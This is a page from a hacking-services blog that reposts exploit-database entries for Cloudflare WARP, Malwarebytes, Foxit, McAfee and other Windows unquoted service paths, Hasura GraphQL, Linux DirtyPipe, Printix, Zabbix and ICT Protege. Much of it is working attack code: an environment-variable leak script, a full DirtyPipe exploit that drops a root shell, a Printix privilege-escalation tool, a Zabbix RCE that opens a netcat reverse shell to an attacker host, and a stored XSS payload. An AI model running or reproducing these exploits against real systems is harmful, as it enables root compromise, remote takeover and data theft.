Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863130978

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Cloudflare WARP 1.4 - Unquoted Service Path
# Date: 05/03/2022
# Exploit Author: Hejap Zairy
# Vendor Homepage: https://www.cloudflare.com/
# Software Link: https://developers.cloudflare.com/warp-client/get-started/windows/
# Version: 1.4.107
# Tested: Windows 10 Pro x64 es

C:\Users\Hejap>sc qc CloudflareWARP
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: CloudflareWARP
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Cloudflare\Cloudflare WARP\\warp-svc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Cloudflare WARP
        DEPENDENCIES       : wlansvc
        SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking 
# Exploit Title: Private Internet Access 3.3 - 'pia-service' Unquoted Service Path
# Date: 04/03/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.privateinternetaccess.com
# Software Link: https://www.privateinternetaccess.com/download
# Version: 3.3.0.100
# Tested: Windows 10 x64
# Contact: https://twitter.com/dmaral3noz

# Step to discover Unquoted Service Path:

C:\Users\saudh>wmic service where 'name like "%PrivateInternetAccessService%"' get name, displayname, pathname, startmode, startname

DisplayName                      Name                          PathName                                                    StartMode  StartName
Private Internet Access Service  PrivateInternetAccessService  "C:\Program Files\Private Internet Access\pia-service.exe"  Auto       LocalSystem

# Service info:

C:\Users\saudh>sc qc PrivateInternetAccessService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: PrivateInternetAccessService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\Private Internet Access\pia-service.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Private Internet Access Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem


#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking 
# Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure
# Software: Hasura GraphQL Community
# Software Link: https://github.com/hasura/graphql-engine
# Version: 2.2.0
# Exploit Author: Dolev Farhi
# Date: 5/05/2022
# Tested on: Ubuntu

import requests

SERVER_ADDR = 'x.x.x.x'

url = 'http://{}/v1/metadata'.format(SERVER_ADDR)

print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read')

while True:
    env_var = input('Type environment variable key to leak.\n> ')
    if not env_var:
        continue

    payload = {
    "type": "bulk",
    "source": "",
    "args": [
        {
            "type": "add_remote_schema",
            "args": {
                "name": "ttt",
                "definition": {
                    "timeout_seconds": 60,
                    "forward_client_headers": False,
                    "headers": [],
                    "url_from_env": env_var
                },
                "comment": ""
            }
        }
    ],
    "resource_version": 2
}
    r = requests.post(url, json=payload)
    try:
       print(r.json()['error'].split('not a valid URI:')[1])
    except IndexError:
        print('Could not parse out VAR, dumping error as is')
        print(r.json().get('error', 'N/A'))
HireHackking 
# Exploit Title: Malwarebytes 4.5 - Unquoted Service Path
# Date: 05/03/2022
# Exploit Author: Hejap Zairy
# Vendor Homepage: https://www.malwarebytes.com/
# Software Link: https://www.malwarebytes.com/mwb-download/
# Version: 4.5.0
# Tested: Windows 10 Pro x64 es

C:\Users\Hejap>sc qc MBAMService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MBAMService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Malwarebytes Service
        DEPENDENCIES       : RPCSS
                           : WINMGMT
        SERVICE_START_NAME : LocalSystem



#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking

Foxit PDF Reader 11.0 - Unquoted Service Path

HACKER · %s · %s

# Exploit Title: Foxit PDF Reader 11.0 - Unquoted Service Path # Date: 05/03/2022 # Exploit Author: Hejap Zairy # Vendor Homepage: https://www.foxit.com/pdf-reader/ # Software Link: https://www.foxit.com/downloads/#Foxit-Reader/ # Version: 11.0.1.49938 # Tested: Windows 10 Pro x64 es C:\Users\Hejap>sc qc FoxitReaderUpdateService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: FoxitReaderUpdateService TYPE : 110 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Foxit PDF Reader Update Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking
// Exploit Title: Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe) // Exploit Author: blasty (peter@haxx.in) // Original Author: Max Kellermann (max.kellermann@ionos.com) // CVE: CVE-2022-0847 /* SPDX-License-Identifier: GPL-2.0 */ /* * Copyright 2022 CM4all GmbH / IONOS SE * * author: Max Kellermann <max.kellermann@ionos.com> * * Proof-of-concept exploit for the Dirty Pipe * vulnerability (CVE-2022-0847) caused by an uninitialized * "pipe_buffer.flags" variable. It demonstrates how to overwrite any * file contents in the page cache, even if the file is not permitted * to be written, immutable or on a read-only mount. * * This exploit requires Linux 5.8 or later; the code path was made * reachable by commit f6dd975583bd ("pipe: merge * anon_pipe_buf*_ops"). The commit did not introduce the bug, it was * there before, it just provided an easy way to exploit it. * * There are two major limitations of this exploit: the offset cannot * be on a page boundary (it needs to write one byte before the offset * to add a reference to this page to the pipe), and the write cannot * cross a page boundary. * * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n' * * Further explanation: https://dirtypipe.cm4all.com/ */ #define _GNU_SOURCE #include <unistd.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/stat.h> #include <sys/user.h> #include <stdint.h> #ifndef PAGE_SIZE #define PAGE_SIZE 4096 #endif // small (linux x86_64) ELF file matroshka doll that does; // fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC); // write(fd, elfcode, elfcode_len) // chmod("/tmp/sh", 04755) // close(fd); // exit(0); // // the dropped ELF simply does: // setuid(0); // setgid(0); // execve("/bin/sh", ["/bin/sh", NULL], [NULL]); unsigned char elfcode[] = { /*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, 0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d, 0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0, 0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00 }; /** * Create a pipe where all "bufs" on the pipe_inode_info ring have the * PIPE_BUF_FLAG_CAN_MERGE flag set. */ static void prepare_pipe(int p[2]) { if (pipe(p)) abort(); const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ); static char buffer[4096]; /* fill the pipe completely; each pipe_buffer will now have the PIPE_BUF_FLAG_CAN_MERGE flag */ for (unsigned r = pipe_size; r > 0;) { unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; write(p[1], buffer, n); r -= n; } /* drain the pipe, freeing all pipe_buffer instances (but leaving the flags initialized) */ for (unsigned r = pipe_size; r > 0;) { unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; read(p[0], buffer, n); r -= n; } /* the pipe is now empty, and if somebody adds a new pipe_buffer without initializing its "flags", the buffer will be mergeable */ } int hax(char *filename, long offset, uint8_t *data, size_t len) { /* open the input file and validate the specified offset */ const int fd = open(filename, O_RDONLY); // yes, read-only! :-) if (fd < 0) { perror("open failed"); return -1; } struct stat st; if (fstat(fd, &st)) { perror("stat failed"); return -1; } /* create the pipe with all flags initialized with PIPE_BUF_FLAG_CAN_MERGE */ int p[2]; prepare_pipe(p); /* splice one byte from before the specified offset into the pipe; this will add a reference to the page cache, but since copy_page_to_iter_pipe() does not initialize the "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */ --offset; ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0); if (nbytes < 0) { perror("splice failed"); return -1; } if (nbytes == 0) { fprintf(stderr, "short splice\n"); return -1; } /* the following write will not create a new pipe_buffer, but will instead write into the page cache, because of the PIPE_BUF_FLAG_CAN_MERGE flag */ nbytes = write(p[1], data, len); if (nbytes < 0) { perror("write failed"); return -1; } if ((size_t)nbytes < len) { fprintf(stderr, "short write\n"); return -1; } close(fd); return 0; } int main(int argc, char **argv) { if (argc != 2) { fprintf(stderr, "Usage: %s SUID\n", argv[0]); return EXIT_FAILURE; } char *path = argv[1]; uint8_t *data = elfcode; int fd = open(path, O_RDONLY); uint8_t *orig_bytes = malloc(sizeof(elfcode)); lseek(fd, 1, SEEK_SET); read(fd, orig_bytes, sizeof(elfcode)); close(fd); printf("[+] hijacking suid binary..\n"); if (hax(path, 1, elfcode, sizeof(elfcode)) != 0) { printf("[~] failed\n"); return EXIT_FAILURE; } printf("[+] dropping suid shell..\n"); system(path); printf("[+] restoring suid binary..\n"); if (hax(path, 1, orig_bytes, sizeof(elfcode)) != 0) { printf("[~] failed\n"); return EXIT_FAILURE; } printf("[+] popping root shell.. (dont forget to clean up /tmp/sh ;))\n"); system("/tmp/sh"); return EXIT_SUCCESS; }
HireHackking

Printix Client 1.3.1106.0 - Privilege Escalation

HACKER · %s · %s

# Exploit Title: Printix Client 1.3.1106.0 - Privilege Escalation # Date: 3/2/2022 # Exploit Author: Logan Latvala # Vendor Homepage: https://printix.net # Software Link: https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip # Version: <= 1.3.1106.0 # Tested on: Windows 7, Windows 8, Windows 10, Windows 11 # CVE : CVE-2022-25090 # Github for project: https://github.com/ComparedArray/printix-CVE-2022-25090 using System; using System.Runtime.InteropServices; using System.Drawing; using System.Reflection; using System.Threading; using System.IO; using System.Text; using System.Resources; using System.Diagnostics; //Assembly COM for transparent creation of the application. //End of Assembly COM For Transparent Creation usage. public class Program { //Initiator class for the program, the program starts on the main method. public static void Main(string[] args) { //Console.SetWindowSize(120,30); //Console.SetBufferSize(120,30); Console.ForegroundColor = ConsoleColor.Blue; Console.WriteLine("┌─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────"); Console.WriteLine("├ oo dP dP "); Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine("├ 88 88 "); Console.ForegroundColor = ConsoleColor.Green; Console.WriteLine("├ dP 88d888b. .d8888b. d888888b d8888P .d8888b. 88d8b.d8b. 88d888b. "); Console.ForegroundColor = ConsoleColor.Blue; Console.WriteLine("├ 88 88' `88 88' `88 .d8P' 88 88ooood8 88'`88'`88 88' `88 "); Console.ForegroundColor = ConsoleColor.Yellow; Console.WriteLine("├ 88 88 88 88. .88 .Y8P 88 88. ... 88 88 88 88. .88 "); Console.ForegroundColor = ConsoleColor.Magenta; Console.WriteLine("├ dP dP dP `88888P8 d888888P dP `88888P' dP dP dP 88Y888P' "); Console.WriteLine("├ 88 "); Console.WriteLine("├ dP "); Console.ForegroundColor = ConsoleColor.Blue; Console.Write("├ For "); Console.ForegroundColor = ConsoleColor.Magenta; Console.Write("Printix "); Console.ForegroundColor = ConsoleColor.Blue; Console.Write("Services Designed By Logan Latvala\n"); Console.WriteLine("└─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────"); Thread.Sleep(3000); string filesH = ""; Console.WriteLine("Drag and drop a payload onto this application for execution."); try { if (args[0]?.Length >0) { Console.WriteLine("File Added: " + args[0]); } } catch (Exception e) { Console.WriteLine("You\'re missing a file here, please ensure that you drag and drop a payload to execute.\n \n We'll print the error for you right here...\n \n"); Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine(e); Console.ReadLine(); Environment.Exit(40); } Console.WriteLine("\n We're going to look for your printix installer, one moment..."); string[] installerSearch = Directory.GetFiles(@"C:\windows\installer\", "*.msi", SearchOption.AllDirectories); double mCheck = 1.00; string trueInstaller = ""; //Starts to enumerate window's installer directory for an author with the name of printix. foreach (string path in installerSearch) { Console.WriteLine("Searching Files: {0} / {1} Files", mCheck, installerSearch.Length); Console.WriteLine("Searching Files... " + (Math.Round((mCheck / installerSearch.Length) * 100)) + "% Done."); if (readFileProperties(path, "Printix")) { trueInstaller = path; Console.WriteLine("We've found your installer, we'll finish enumeration."); goto MGMA; } mCheck++; } //Flag for enumeration when the loop needs to exit, since it shouldn't loop infinitely. MGMA: if (trueInstaller == "") { Console.WriteLine("We can't find your installer, you are not vulnerable."); Thread.Sleep(2000); Environment.Exit(12); } Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────"); Console.WriteLine("├ We are starting to enumerate your temporary directory."); Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────"); //Start a new thread here for enumeration. Thread t = new Thread(() => newTempThread(filesH, args)); t.Start(); Process.Start(trueInstaller); Console.WriteLine("All done."); Console.ReadLine(); } public static void newTempThread(string filesH, string[] args) { while (true) { try { //Starts the inheriting process for printix, in which scans for the files and relays their contents. string[] files = Directory.GetFiles(@"C:\Users\" + Environment.UserName + @"\AppData\Local\Temp\", "msiwrapper.ini", SearchOption.AllDirectories); if (!string.IsNullOrEmpty(files[0])) { foreach (string fl in files) { if (!filesH.Contains(fl)) { //filesH += " " + fl; string[] fileText = File.ReadAllLines(fl); int linerc = 0; foreach (string liners in fileText) { if (liners.Contains("SetupFileName")) { //Most likely the temporary directory for setup, which presents it properly. Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────"); Console.WriteLine("├ " + fl); fileText[linerc] = @"SetupFileName=" + "\"" + args[0] + "\""; Console.WriteLine("├ " + fileText[linerc] + ""); Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────"); Console.WriteLine("│"); filesH += " " + fl; File.WriteAllText(fl, string.Empty); File.WriteAllLines(fl, fileText); } linerc++; } } } } } catch (Exception e) { Console.WriteLine("There was an error, try re-running the program. \n" + e); Console.ReadLine(); } Thread.Sleep(20); } } public static bool readFileProperties(string file, string filter) { System.Diagnostics.Process process = new System.Diagnostics.Process(); System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo(); startInfo.UseShellExecute = false; startInfo.RedirectStandardOutput = true; startInfo.FileName = "CMD.exe"; startInfo.Arguments = "/c PowerShell -Command \"$FilePath='" + file + "'; Write-Host ((New-Object -COMObject Shell.Application).NameSpace((Split-Path -Parent -Path $FilePath))).ParseName((Split-Path -Leaf -Path $FilePath)).ExtendedProperty('System.Author')\""; process.StartInfo = startInfo; process.Start(); string output = process.StandardOutput.ReadToEnd(); process.WaitForExit(); if (output.Contains(filter)) { return true; } else { return false; } //wmic datafile where Name="F:\\ekojs.txt" get Description,Path,Status,Version } }
HireHackking
# Exploit Title: Wondershare Dr.Fone 12.0.18 - 'Wondershare InstallAssist' Unquoted Service Path # Discovery by: Mohamed Alzhrani # Discovery Date: 2022-03-08 # Vendor Homepage: https://www.wondershare.com/ # Software Link : https://download.wondershare.com/drfone_full3360.exe # Tested Version: 12.0.18 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\Users\0xMaz>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Wondershare Install Assist Service Wondershare InstallAssist C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto # Service info: C:\Users\0xMaz>sc qc "Wondershare InstallAssist" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Wondershare InstallAssist TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\ProgramData\Wondershare\Service\InstallAssistService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Install Assist Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: The local user able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking
# Exploit Title: McAfee® Safe Connect VPN - Unquoted Service Path Elevation Of Privilege # Date: 09/03/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.mcafee.com/ # Software Link: https://www.mcafee.com/en-us/vpn/mcafee-safe-connect.html # Version: 2.13 # Tested: Windows 10 x64 # Contact: https://twitter.com/dmaral3noz C:\Users\saudh>sc qc SafeConnectService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: SafeConnectService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\McAfee\McAfee Safe Connect\SafeConnect.ServiceHost.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : McAfee Safe Connect Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking

Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)

HACKER · %s · %s

# Exploit Title: Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated) # Date: 9/3/2022 # Exploit Author: Hussien Misbah # Vendor Homepage: https://www.zabbix.com/ # Software Link: https://www.zabbix.com/rn/rn5.0.17 # Version: 5.0.17 # Tested on: Linux # Reference: https://github.com/HussienMisbah/tools/tree/master/Zabbix_exploit #!/usr/bin/python3 # note : this is blind RCE so don't expect to see results on the site # this exploit is tested against Zabbix 5.0.17 only import sys import requests import re import random import string import colorama from colorama import Fore print(Fore.YELLOW+"[*] this exploit is tested against Zabbix 5.0.17 only") print(Fore.YELLOW+"[*] can reach the author @ https://hussienmisbah.github.io/") def item_name() : letters = string.ascii_letters item = ''.join(random.choice(letters) for i in range(20)) return item if len(sys.argv) != 6 : print(Fore.RED +"[!] usage : ./expoit.py <target url> <username> <password> <attacker ip> <attacker port>") sys.exit(-1) url = sys.argv[1] username =sys.argv[2] password = sys.argv[3] host = sys.argv[4] port = sys.argv[5] s = requests.Session() headers ={ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", } data = { "request":"hosts.php", "name" : username , "password" : password , "autologin" :"1" , "enter":"Sign+in" } proxies = { 'http': 'http://127.0.0.1:8080' } r = s.post(url+"/index.php",data=data) #proxies=proxies) if "Sign out" not in r.text : print(Fore.RED +"[!] Authentication failed") sys.exit(-1) if "Zabbix 5.0.17" not in r.text : print(Fore.RED +"[!] This is not Zabbix 5.0.17") sys.exit(-1) if "filter_hostids%5B0%5D=" in r.text : try : x = re.search('filter_hostids%5B0%5D=(.*?)"', r.text) hostId = x.group(1) except : print(Fore.RED +"[!] Exploit failed to resolve HostID") print(Fore.BLUE +"[?] you can find it under /items then add item") sys.exit(-1) else : print(Fore.RED +"[!] Exploit failed to resolve HostID") print(Fore.BLUE +"[?] you can find HostID under /items then add item") sys.exit(-1) sid= re.search('<meta name="csrf-token" content="(.*)"/>',r.text).group(1) # hidden_csrf_token command=f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {host} {port} >/tmp/f" payload = f"system.run[{command},nowait]" Random_name = item_name() data2 ={ "sid":sid,"form_refresh":"1","form":"create","hostid":hostId,"selectedInterfaceId":"0","name":Random_name,"type":"0","key":payload,"url":"","query_fields[name][1]":"","query_fields[value][1]":"","timeout":"3s","post_type":"0","posts":"","headers[name][1]":"","headers[value][1]":"","status_codes":"200","follow_redirects":"1","retrieve_mode":"0","http_proxy":"","http_username":"","http_password":"","ssl_cert_file":"","ssl_key_file":"","ssl_key_password":"","interfaceid":"1","params_es":"","params_ap":"","params_f":"","value_type":"3","units":"","delay":"1m","delay_flex[0][type]":"0","delay_flex[0][delay]":"","delay_flex[0][schedule]":"","delay_flex[0][period]":"","history_mode":"1","history":"90d","trends_mode":"1","trends":"365d","valuemapid":"0","new_application":"","applications[]":"0","inventory_link":"0","description":"","status":"0","add":"Add" } r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"} ) no_pages= r2.text.count("?page=") #################################################[Searching in all pages for the uploaded item]################################################# page = 1 flag=False while page <= no_pages : r_page=s.get(url+f"/items.php?page={page}" ,headers=headers ) if Random_name in r_page.text : print(Fore.GREEN+"[+] the payload has been Uploaded Successfully") x2 = re.search(rf"(\d+)[^\d]>{Random_name}",r_page.text) try : itemId=x2.group(1) except : pass print(Fore.GREEN+f"[+] you should find it at {url}/items.php?form=update&hostid={hostId}&itemid={itemId}") flag=True break else : page +=1 if flag==False : print(Fore.BLUE +"[?] do you know you can't upload same key twice ?") print(Fore.BLUE +"[?] maybe it is already uploaded so set the listener and wait 1m") print(Fore.BLUE +"[*] change the port and try again") sys.exit(-1) #################################################[Executing the item]################################################# data2["form"] ="update" data2["selectedInterfaceId"] = "1" data2["check_now"]="Execute+now" data2.pop("add",None) data2["itemid"]=itemId, print(Fore.GREEN+f"[+] set the listener at {port} please...") r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"}) # ,proxies=proxies ) print(Fore.BLUE+ "[?] note : it takes up to +1 min so be patient :)") answer =input(Fore.BLUE+"[+] got a shell ? [y]es/[N]o: ") if "y" in answer.lower() : print(Fore.GREEN+"Nice !") else : print(Fore.RED+"[!] if you find out why please contact me ") sys.exit(0)
HireHackking

ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS) # Exploit Author: LiquidWorm Vendor: Integrated Control Technology Ltd. Product web page: https://www.ict.co Affected version: GX: Ver: 2.08.1002 K1B3 Lib: 04.00.217 Int: 2.3.235.J013 OS: 2.0.20 WX: Ver: 4.00 284 H062 App: 02.08.766 Lib: 04.00.169 Int: 02.2.208 Summary: Protege GX is an enterprise level integrated access control, intrusion detection and building automation solution with a feature set that is easy to operate, simple to integrate and effortless to extend. Protege WX is an all-in-one, web-based, cross-platform system that gives you a fully functional access control and intrusion detection solution in a fraction of the time of conventional software. With no software to install, setup is quick and simple. Connect the Controller and system components, then open a web browser to launch the intuitive wizard-driven interface which guides you through the process of configuring your system. Desc: The application suffers from an authenticated stored XSS vulnerability. The issue is triggered when input passed to the 'Name' parameter is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Microsoft-WinCE/6.00 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5699 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5699.php 08.02.2022 -- UI navigation: -------------- Scheduling > Daylight Savings > (Name field). Decrypted POST request: ----------------------- POST /daylightsaving.htm Command&Type=Submit&SubType=GXT_DAYLIGHTSAVINGS_TBL&DaylightSavingId=1&action=update&Name=ZSL%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&StartMonth=10&EndMonth=2&StartDay=41&EndDay=41&RecId=1 Encrypted GET request: ---------------------- http://CONTROLLER_IP/PRT_CTRL_DIN_ISAPI.dll?8F7FFABE947FEE9C78850F2BA679A3B1645F6378696B32385B56303C43604B48F8CD082303AADCFCECEA082384C860AB16159DADCD89C9A7A2A47EE1F49A7A98AC9A8572882F88FAE5409CF6E06E04DA7F7D10AA6D45525C62B2A62FD949FF00E6B6B7471010908D9A59FBA1D9F304AD8CB24E0CE317A0870AA5A5253F0FCD58CA2BC874AC002CB62422E184FB9F13161C9C00E08F258B8519578EA2793A0C28A4AF51CF65637C0C2F972CE3F49703214A63AA78B3EBE5C720DBE1E9C97E772334EC95480956E27DB6D1DF4489C5D60CCE27D69B388CA6C69A9DC72D85127F870DDA4E459CA245508EBFD66D1C83D9FA12838C1F426E538D5D75192B57DF5AF6 Additional info: ---------------- Databse backup predictable name: Db_D3037E8A_8_Feb_22.bak The D3037E8A is the serial number of the onboard reader. Encrypt/Decrypt functions: -------------------------- From console: > localStorage.getItem("WXKey") < '8EDB22D9FB767538' function encryptAES(a, c) { a = a.toString(); a = unescape(encodeURIComponent(a)); "undefined" == typeof c && (c = !0); if (0 == servertype) return a; var b = localStorage.getItem("WXKey"); if ("" == b || null == b) return a; for (var d = "", e = 0; 16 > e; e++) d += String.fromCharCode(Math.floor(75 * Math.random() + 48)); a = d + mcrypt.Encrypt(addPKCS7(a), d, b, "rijndael-128", "cbc"); return a = c ? getCookie("SESSID") + strToHex(a) : strToHex(a) } function decryptAES(a) { if (null == a) return ""; a = a.toString(); if ("<invalid session> < Packet not Init and not encrypted. >" == a) a = 0 == servertype ? "login.php" : "login.htm", window.location = a + 